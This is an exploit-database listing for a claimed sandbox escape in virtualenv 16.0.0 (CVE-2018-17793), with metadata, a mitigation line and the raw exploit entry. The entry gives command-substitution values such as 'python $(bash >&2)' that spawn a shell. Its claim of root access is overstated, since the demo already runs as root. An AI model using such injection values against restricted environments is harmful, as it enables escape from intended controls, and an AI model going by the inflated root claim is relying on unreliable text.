header-logo
Suggest Exploit
vendor:
virtualenv
by:
vr_system
7.5
CVSS
HIGH
Sandbox Escape
CWE
Product Name: virtualenv
Affected Version From: 16.0.0
Affected Version To: 16.0.0
Patch Exists: YES
Related CWE: CVE-2018-17793
CPE:
Metasploit:
Other Scripts:
Platforms Tested: kali linux
2018

virtualenv 16.0.0 – Sandbox Escape

The virtualenv version 16.0.0 allows an attacker to escape the sandbox and execute arbitrary commands with root privileges. By using the '$(bash >&2)' or '$(rbash >&2)' command injection technique, an attacker can execute arbitrary commands in the context of the virtual environment.

Mitigation:

Upgrade to a version of virtualenv that is not affected by this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: virtualenv 16.0.0 - Sandbox Escape
# Date: 2018-10-02
# Exploit Author: vr_system
# Vendor Homepage: https://virtualenv.pypa.io/en/stable/
# Software Link: https://virtualenv.pypa.io/en/stable/
# Version: 16.0.0
# Tested on: kali linux
# CVE : CVE-2018-17793

# 1 Install
# root@kali:~#pip install virtualenv
# root@kali:~#virtualenv test_env
# root@kali:~#cd test_env/
# root@kali:~/test_env#source ./bin/activate

# 2 Sandbox escape

(test_env) root@kali:~/test_env#python $(bash >&2)
(test_env) root@kali:~/test_env#python $(rbash >&2)

Navigation

Suggest Exploit

Services By CQR